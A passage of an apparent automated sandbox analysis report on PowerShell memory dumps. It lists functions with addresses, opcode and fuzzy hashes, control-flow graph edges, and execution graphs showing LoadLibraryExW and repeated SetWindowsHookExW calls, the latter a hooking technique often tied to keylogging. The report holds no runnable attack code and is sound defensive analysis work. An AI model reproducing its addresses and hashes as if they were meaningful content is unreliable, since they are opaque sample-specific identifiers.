                                                                                      • Opcode ID: 3b129fabb9fe614e34b2eb9605c4841d43dc267eccbf92e8384ecee06aacc63e
                                                                                      • Instruction ID: f6f3300b70d707aa23cb7b037e60f969f7630276544bc35cebbbf99113b8022e
                                                                                      • Opcode Fuzzy Hash: 3b129fabb9fe614e34b2eb9605c4841d43dc267eccbf92e8384ecee06aacc63e
                                                                                      • Instruction Fuzzy Hash: FDD1F431E4CA4A4FEB94DA2C94556BCBBF1FF543A0B5C02BAD40ECB196DA29EC01C741
                                                                                      Function 00007FF887DA41A9 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: b97d1ceb58366267c75c3d145e99d70282183f5bf70b02ed11ce3568f2979f70
                                                                                      • Instruction ID: dad2f8cc5bb06ef94b9b693a01f7a0e35ef5abaa35fe9be7733842cbb7a37889
                                                                                      • Opcode Fuzzy Hash: b97d1ceb58366267c75c3d145e99d70282183f5bf70b02ed11ce3568f2979f70
                                                                                      • Instruction Fuzzy Hash: B8D10531E4CA894FEB95DB2C94546B9BBF1FF54390B5402BAD44EC319BDA29EC02C741
                                                                                      Function 00007FF887DA73B3 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: f2c2000638f8d72a1a2000983eb788c738706ffb6b6fe2b17ed643c0823b7537
                                                                                      • Instruction ID: 6f3c98b159e281a97b7b21193c8fc6b0d54b5622a59df007261d635de445b504
                                                                                      • Opcode Fuzzy Hash: f2c2000638f8d72a1a2000983eb788c738706ffb6b6fe2b17ed643c0823b7537
                                                                                      • Instruction Fuzzy Hash: 8FA1D231E4CA4A4FEB95DA2C95546BCBBF1FF543A4B5C02BAD00ECB196DA29EC01C741
                                                                                      Function 00007FF887DA16A6 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: dd2f634ad38c2cc35e7dea3c75fde27145863376c71e6a89b3f1fc6059f51cfa
                                                                                      • Instruction ID: ceb0155ff3d02684ec239ad69cf8836373979615de89c0468c284b0f2ca1826a
                                                                                      • Opcode Fuzzy Hash: dd2f634ad38c2cc35e7dea3c75fde27145863376c71e6a89b3f1fc6059f51cfa
                                                                                      • Instruction Fuzzy Hash: 09713832E4CA8A5FEBA5DA6C54446B9B7F1FF553A0B0802BAC44EC7197DE199C05C382
                                                                                      Function 00007FF887DA16BD Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 9607084d4f89885638eaff9643e532071036c21923b25089f3d6152617367a76
                                                                                      • Instruction ID: 8eff390a418d618f4599b64538394360946309ce010e80b72a12985b1d898afd
                                                                                      • Opcode Fuzzy Hash: 9607084d4f89885638eaff9643e532071036c21923b25089f3d6152617367a76
                                                                                      • Instruction Fuzzy Hash: A941073294DB864FEB96DB2848546B9BBF1FF56250B1812FAC04DCB0D7EA199C05C381
                                                                                      Function 00007FF887CDF1A6 Relevance: .3, Instructions: 335COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6564a50128b34483a7da3bd8719c5a919188809dae89f8cc108da8933159bbe
                                                                                      • Instruction ID: 8520a1185496f9fd91f1762436d052044de325ac5b7aa3049e5d35cebb43fe8f
                                                                                      • Opcode Fuzzy Hash: b6564a50128b34483a7da3bd8719c5a919188809dae89f8cc108da8933159bbe
                                                                                      • Instruction Fuzzy Hash: 9DB1C330508A8D4FEB68DF28D8557E93BE1FF55350F04427EE85DC7292CA78A945CB82
                                                                                      Function 00007FF887CE1DCE Relevance: .2, Instructions: 215COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43c26ffc3b3c98a7f0be41f0522b3fd8e3a3b680f57a3e1bd59fa7e965f6aaf6
                                                                                      • Instruction ID: aa2a805a7d01cddc033d701cd9e366faf4d9117763733cb65272af3c340323bc
                                                                                      • Opcode Fuzzy Hash: 43c26ffc3b3c98a7f0be41f0522b3fd8e3a3b680f57a3e1bd59fa7e965f6aaf6
                                                                                      • Instruction Fuzzy Hash: 8D51C432E5CA498FE798DB58D8556BD77E2FF99780F04017DE44EC7292CE28AC018782
                                                                                      Function 00007FF887CDECA4 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8999c1f4df1ad9188916324ee5167c81a2b95c75450f1640caa6636b23cc7695
                                                                                      • Instruction ID: aeb843933a492674073c19f0e52e6045f6410eaf0bce6a64bd659394b66c9e5b
                                                                                      • Opcode Fuzzy Hash: 8999c1f4df1ad9188916324ee5167c81a2b95c75450f1640caa6636b23cc7695
                                                                                      • Instruction Fuzzy Hash: 19311A3085968E8EFBB4AF18CC1ABFD36A2FF45359F404139D40E871A3DE786985CA11
                                                                                      Function 00007FF887CE41E1 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 955fbf317e62c8128288f5f17a23d124c61de64b137bfbf07371ebe02c288e39
                                                                                      • Instruction ID: f2e7707e60c24803af75b309130d207136e8258d0c9c3c848b42ff965181eb0b
                                                                                      • Opcode Fuzzy Hash: 955fbf317e62c8128288f5f17a23d124c61de64b137bfbf07371ebe02c288e39
                                                                                      • Instruction Fuzzy Hash: D401B946B8D9C91FE78A863C98252B43BE2EF96550B4D41F7D44CCB1E2D8085D558391
                                                                                      Function 00007FF887CD4835 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                                      • Instruction ID: 6d52d37cb80ed66cb9043a51b8ccd48ea06a25d4b947480943b128721102d009
                                                                                      • Opcode Fuzzy Hash: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                                      • Instruction Fuzzy Hash: 7801677115CB0C4FD744EF4CE451AA9B7E0FB95364F10056DE58AC3651DA36E881CB46
                                                                                      Function 00007FF887CE28FA Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f608aeffca74f50365b6bd6ce823e4a144ebfc760c436d8e611e2d872101d1da
                                                                                      • Instruction ID: 9b844fec6dece7f87a6c65f01f6d793cc20db231220beaa2ded84b46cf5bc636
                                                                                      • Opcode Fuzzy Hash: f608aeffca74f50365b6bd6ce823e4a144ebfc760c436d8e611e2d872101d1da
                                                                                      • Instruction Fuzzy Hash: 1301F422B1D94C8FC754E73CD818AAA37E1EF8A640B1940FBD00DCB2A6DD248C06C381
                                                                                      Function 00007FF887CDFE40 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89b5aed711bceaba17042ea35e1f5a11086dc85e13d79864f4da79c95054ee52
                                                                                      • Instruction ID: e3e6c25024e28f7634ef4cc07cc9efa19653180b51eae4d73746bc15c20ea28b
                                                                                      • Opcode Fuzzy Hash: 89b5aed711bceaba17042ea35e1f5a11086dc85e13d79864f4da79c95054ee52
                                                                                      • Instruction Fuzzy Hash: 63F05E33B68C1D5FD794E76CD418BAA22E2EF89750B1541BAD00DC72AADE689C468380
                                                                                      Function 00007FF887CE450E Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b5904bf0897acf28d769d564c1b57ff877fb53a728f22ace1f89b3bf8388f433
                                                                                      • Instruction ID: 4d639e052a954bc2b8c83ba49d26785144d008411c181512968a2b9335ef2453
                                                                                      • Opcode Fuzzy Hash: b5904bf0897acf28d769d564c1b57ff877fb53a728f22ace1f89b3bf8388f433
                                                                                      • Instruction Fuzzy Hash: B2B01200BAD83A01A58431D8B0123FCF1405B40660F810470E41DC01C3CD4E5983008B

                                                                                      Non-executed Functions

                                                                                      Function 00007FF887CD044D Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8,#$P/#$p0#$-#$/#
                                                                                      • API String ID: 0-1420174107
                                                                                      • Opcode ID: 9122d492b900e4524b1c41b8159900e1315817a9018355c3eac3d50c884a5795
                                                                                      • Instruction ID: c253810e4511a7ecdc64b90b3bbbaad45714676f6566f083bb04cc448d449010
                                                                                      • Opcode Fuzzy Hash: 9122d492b900e4524b1c41b8159900e1315817a9018355c3eac3d50c884a5795
                                                                                      • Instruction Fuzzy Hash: 5C317152C8E6C14FE3278678682A17C7F72BF1365071980FBC49C8B1EBD4899E84C356
                                                                                      Function 00007FF887DA4C55 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (]F$H$4$H$4$H$4
                                                                                      • API String ID: 0-1436280677
                                                                                      • Opcode ID: 7e5518a052998818a7489bbc0a4c6760733350194032a81faaa83e8755690827
                                                                                      • Instruction ID: 745c24cca684296b14a384a66e1f7b251a0a075693715f314c154f9ff445de5b
                                                                                      • Opcode Fuzzy Hash: 7e5518a052998818a7489bbc0a4c6760733350194032a81faaa83e8755690827
                                                                                      • Instruction Fuzzy Hash: 9CA12821E4DA860FE796962C68545B9BBF1FF96290B0C02FBC44DC719BE9199C05C382

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:3
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 9241 7ff887ce6c34 9242 7ff887ce6c3d LoadLibraryExW 9241->9242 9244 7ff887ce6ced 9242->9244

                                                                                      Executed Functions

                                                                                      Function 00007FF887DA09F2 Relevance: 2.9, Strings: 2, Instructions: 403COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 64 7ff887da09f2-7ff887da09f7 65 7ff887da0a39-7ff887da0a6d 64->65 66 7ff887da09f9-7ff887da0a26 64->66 69 7ff887da0a73-7ff887da0a7d 65->69 70 7ff887da0c2c-7ff887da0c41 65->70 66->65 72 7ff887da0a96-7ff887da0aa0 69->72 73 7ff887da0a7f-7ff887da0a94 69->73 77 7ff887da0c43-7ff887da0c4a 70->77 78 7ff887da0c4b-7ff887da0c64 70->78 72->70 75 7ff887da0aa6-7ff887da0ab0 72->75 73->72 79 7ff887da0ab2-7ff887da0abf 75->79 80 7ff887da0ac9-7ff887da0ad3 75->80 77->78 81 7ff887da0c66 78->81 82 7ff887da0c68-7ff887da0cb3 78->82 79->80 87 7ff887da0ac1-7ff887da0ac7 79->87 80->70 84 7ff887da0ad9-7ff887da0ae3 80->84 81->82 102 7ff887da0cb5-7ff887da0cb8 82->102 103 7ff887da0cd4-7ff887da0cde 82->103 85 7ff887da0ae5-7ff887da0af3 84->85 86 7ff887da0afd-7ff887da0b08 84->86 85->86 91 7ff887da0af5-7ff887da0afb 85->91 86->70 90 7ff887da0b0e-7ff887da0b18 86->90 87->80 93 7ff887da0b1a-7ff887da0b2a 90->93 94 7ff887da0b2e-7ff887da0b3f 90->94 91->86 93->94 94->70 98 7ff887da0b45-7ff887da0b4f 94->98 100 7ff887da0b51-7ff887da0b66 98->100 101 7ff887da0b68-7ff887da0b7e 98->101 100->101 107 7ff887da0b80 101->107 108 7ff887da0b82-7ff887da0b8b 101->108 102->103 109 7ff887da0cba-7ff887da0cd1 102->109 105 7ff887da0ce0-7ff887da0ce9 103->105 106 7ff887da0cea-7ff887da0d2a 103->106 107->108 110 7ff887da0b8d 108->110 111 7ff887da0b8f-7ff887da0b97 108->111 110->111 115 7ff887da0b9b-7ff887da0ba4 111->115 116 7ff887da0ba6 115->116 117 7ff887da0ba8-7ff887da0bc8 115->117 116->117 120 7ff887da0bca 117->120 121 7ff887da0bcc-7ff887da0be6 117->121 120->121 123 7ff887da0be8 121->123 124 7ff887da0bea-7ff887da0c04 121->124 123->124 126 7ff887da0c06 124->126 127 7ff887da0c08-7ff887da0c29 124->127 126->127
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1B_L$6K:
                                                                                      • API String ID: 0-2684207276
                                                                                      • Opcode ID: e77e40d4c8caa8040aaf179b15a0a243ed31eaafded66ce781c71dc7ee5bbab8
                                                                                      • Instruction ID: d0518b4d728b0ceef2c85947ffa7e9f4c206052228f5083fdeadd49de56d656f
                                                                                      • Opcode Fuzzy Hash: e77e40d4c8caa8040aaf179b15a0a243ed31eaafded66ce781c71dc7ee5bbab8
                                                                                      • Instruction Fuzzy Hash: CDB1F621A0DB854FDB9ADB288854979BBF1FF6A35070902FAC05AC71E7ED14EC45C392
                                                                                      Function 00007FF887DA0A2B Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 202 7ff887da0a2b-7ff887da0a6d 204 7ff887da0a73-7ff887da0a7d 202->204 205 7ff887da0c2c-7ff887da0c41 202->205 206 7ff887da0a96-7ff887da0aa0 204->206 207 7ff887da0a7f-7ff887da0a94 204->207 211 7ff887da0c43-7ff887da0c4a 205->211 212 7ff887da0c4b-7ff887da0c64 205->212 206->205 209 7ff887da0aa6-7ff887da0ab0 206->209 207->206 213 7ff887da0ab2-7ff887da0abf 209->213 214 7ff887da0ac9-7ff887da0ad3 209->214 211->212 215 7ff887da0c66 212->215 216 7ff887da0c68-7ff887da0cb3 212->216 213->214 221 7ff887da0ac1-7ff887da0ac7 213->221 214->205 218 7ff887da0ad9-7ff887da0ae3 214->218 215->216 236 7ff887da0cb5-7ff887da0cb8 216->236 237 7ff887da0cd4-7ff887da0cde 216->237 219 7ff887da0ae5-7ff887da0af3 218->219 220 7ff887da0afd-7ff887da0b08 218->220 219->220 225 7ff887da0af5-7ff887da0afb 219->225 220->205 224 7ff887da0b0e-7ff887da0b18 220->224 221->214 227 7ff887da0b1a-7ff887da0b2a 224->227 228 7ff887da0b2e-7ff887da0b3f 224->228 225->220 227->228 228->205 232 7ff887da0b45-7ff887da0b4f 228->232 234 7ff887da0b51-7ff887da0b66 232->234 235 7ff887da0b68-7ff887da0b7e 232->235 234->235 241 7ff887da0b80 235->241 242 7ff887da0b82-7ff887da0b8b 235->242 236->237 243 7ff887da0cba-7ff887da0cd1 236->243 239 7ff887da0ce0-7ff887da0ce9 237->239 240 7ff887da0cea-7ff887da0d2a 237->240 241->242 244 7ff887da0b8d 242->244 245 7ff887da0b8f-7ff887da0b97 242->245 244->245 249 7ff887da0b9b-7ff887da0ba4 245->249 250 7ff887da0ba6 249->250 251 7ff887da0ba8-7ff887da0bc8 249->251 250->251 254 7ff887da0bca 251->254 255 7ff887da0bcc-7ff887da0be6 251->255 254->255 257 7ff887da0be8 255->257 258 7ff887da0bea-7ff887da0c04 255->258 257->258 260 7ff887da0c06 258->260 261 7ff887da0c08-7ff887da0c29 258->261 260->261
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1B_L$6K:
                                                                                      • API String ID: 0-2684207276
                                                                                      • Opcode ID: 4ccdb53ca10282248d3c970be9a2e42736ad856facc289bd5db5d667894eaf73
                                                                                      • Instruction ID: d4f4cdfde3984a023a3a6cfa7a29e0e3cb60d70da590c0403ec6488ff9ed4db8
                                                                                      • Opcode Fuzzy Hash: 4ccdb53ca10282248d3c970be9a2e42736ad856facc289bd5db5d667894eaf73
                                                                                      • Instruction Fuzzy Hash: D9712530A0CB494FDF89EA288554939BBE2FF6A340B1402BEC45EC7196ED24FC45C791
                                                                                      Function 00007FF887DA33D5 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 262 7ff887da33d5-7ff887da3464 265 7ff887da346a-7ff887da3474 262->265 266 7ff887da36cc-7ff887da374a 262->266 267 7ff887da3476-7ff887da3483 265->267 268 7ff887da348d-7ff887da3492 265->268 291 7ff887da374c-7ff887da3752 266->291 267->268 275 7ff887da3485-7ff887da348b 267->275 270 7ff887da3670-7ff887da367a 268->270 271 7ff887da3498-7ff887da349b 268->271 273 7ff887da3689-7ff887da36c9 270->273 274 7ff887da367c-7ff887da3688 270->274 276 7ff887da34b2 271->276 277 7ff887da349d-7ff887da34b0 271->277 273->266 275->268 281 7ff887da34b4-7ff887da34b6 276->281 277->281 281->270 282 7ff887da34bc-7ff887da34c3 281->282 285 7ff887da34c5-7ff887da34cb 282->285 285->285 287 7ff887da34cd 285->287 289 7ff887da34cf-7ff887da34d5 287->289 289->289 292 7ff887da34d7-7ff887da34f0 289->292 291->291 293 7ff887da3754 291->293 301 7ff887da34f2-7ff887da3505 292->301 302 7ff887da3507 292->302 295 7ff887da3756-7ff887da375c 293->295 295->295 296 7ff887da375e-7ff887da378b 295->296 304 7ff887da3509-7ff887da350b 301->304 302->304 304->270 306 7ff887da3511-7ff887da3519 304->306 306->266 307 7ff887da351f-7ff887da3529 306->307 308 7ff887da3545-7ff887da3555 307->308 309 7ff887da352b-7ff887da3543 307->309 308->270 313 7ff887da355b-7ff887da3562 308->313 309->308 314 7ff887da3564-7ff887da356a 313->314 314->314 315 7ff887da356c 314->315 316 7ff887da356e-7ff887da3574 315->316 316->316 317 7ff887da3576-7ff887da358c 316->317 317->270 321 7ff887da3592-7ff887da3599 317->321 322 7ff887da359b-7ff887da35a1 321->322 322->322 323 7ff887da35a3 322->323 324 7ff887da35a5-7ff887da35ab 323->324 324->324 325 7ff887da35ad-7ff887da35be 324->325 328 7ff887da35c0-7ff887da35d2 325->328 329 7ff887da35e9 325->329 335 7ff887da35d4 328->335 336 7ff887da35d6-7ff887da35e7 328->336 330 7ff887da35eb-7ff887da35ed 329->330 330->270 331 7ff887da35f3-7ff887da35fb 330->331 333 7ff887da360b 331->333 334 7ff887da35fd-7ff887da3607 331->334 339 7ff887da3610-7ff887da3625 333->339 337 7ff887da3627-7ff887da362e 334->337 338 7ff887da3609 334->338 335->336 336->330 340 7ff887da3630-7ff887da3636 337->340 338->339 339->337 340->340 343 7ff887da3638-7ff887da3656 340->343 346 7ff887da365d-7ff887da366f 343->346
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 5ec97eb3407716bdefef98ce2511388da62be540dffc74cbe9f9c248a112ce65
                                                                                      • Instruction ID: 985daed11836aa36d6cb56fe2385c799a057e044d59f0fbfe3a588219cb93b30
                                                                                      • Opcode Fuzzy Hash: 5ec97eb3407716bdefef98ce2511388da62be540dffc74cbe9f9c248a112ce65
                                                                                      • Instruction Fuzzy Hash: E0D12632D4DA8A5FEB95DB6888155B9BBF2FF16390B0802BED04EC71D7DA18A805C351
                                                                                      Function 00007FF887CE6C34 Relevance: 1.6, APIs: 1, Instructions: 116libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 347 7ff887ce6c34-7ff887ce6c3b 348 7ff887ce6c46-7ff887ce6caf 347->348 349 7ff887ce6c3d-7ff887ce6c45 347->349 352 7ff887ce6cb1-7ff887ce6cb6 348->352 353 7ff887ce6cb9-7ff887ce6ceb LoadLibraryExW 348->353 349->348 352->353 354 7ff887ce6cf3-7ff887ce6d1a 353->354 355 7ff887ce6ced 353->355 355->354
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2132984830.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 139c88f3dc9c0d27a4f66bc2bdc558c818c42548b9ea67c33de2e2d8f8dcae21
                                                                                      • Instruction ID: b8f92c052f729bc0113d238888e5c89cf9cc04dc5141515e998bbd9ca94d6411
                                                                                      • Opcode Fuzzy Hash: 139c88f3dc9c0d27a4f66bc2bdc558c818c42548b9ea67c33de2e2d8f8dcae21
                                                                                      • Instruction Fuzzy Hash: F331D23190CA5C8FDB59DB98D845AE9BBF1FB66320F04426BD009D3152DB74A846CB91

                                                                                      Non-executed Functions

                                                                                      Function 00007FF887DA94EE Relevance: 6.7, Strings: 5, Instructions: 497COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2133657691.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ$ bJ$ bJ$07K:$07K:
                                                                                      • API String ID: 0-2473794636
                                                                                      • Opcode ID: 8dba24c19117552fd5ea22702fe0b82ebe7e9001fe42938c9c0195e62370e0f8
                                                                                      • Instruction ID: a0941810ca73ccdd13233504514930d139e113fece8384918f8605ee296b310a
                                                                                      • Opcode Fuzzy Hash: 8dba24c19117552fd5ea22702fe0b82ebe7e9001fe42938c9c0195e62370e0f8
                                                                                      • Instruction Fuzzy Hash: 12F1132194DAC95FDB96AB6888546B9BBF0FF66350F0802FBD44DCB097EA1C9C05C352

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:21
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 7901 7ff887cdfc71 7902 7ff887cdfc9a 7901->7902 7903 7ff887cd94a0 SetWindowsHookExW 7902->7903 7903->7902 7912 7ff887ce3411 7914 7ff887ce342f 7912->7914 7913 7ff887ce0290 SetWindowsHookExW 7913->7914 7914->7913 7915 7ff887ce3572 7914->7915 7904 7ff887ce343f 7906 7ff887ce3440 7904->7906 7907 7ff887ce3572 7906->7907 7908 7ff887ce0290 7906->7908 7909 7ff887ce0299 SetWindowsHookExW 7908->7909 7911 7ff887ce0551 7909->7911 7911->7906 7892 7ff887ce02b8 7897 7ff887ce02be 7892->7897 7896 7ff887ce0551 7898 7ff887ce04a0 SetWindowsHookExW 7897->7898 7900 7ff887ce02bd SetWindowsHookExW 7898->7900 7900->7896 7916 7ff887cd97da 7917 7ff887ce04a0 SetWindowsHookExW 7916->7917 7919 7ff887ce0551 7917->7919

                                                                                      Executed Functions

                                                                                      Function 00007FF887DA387C Relevance: 4.4, Strings: 3, Instructions: 603COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
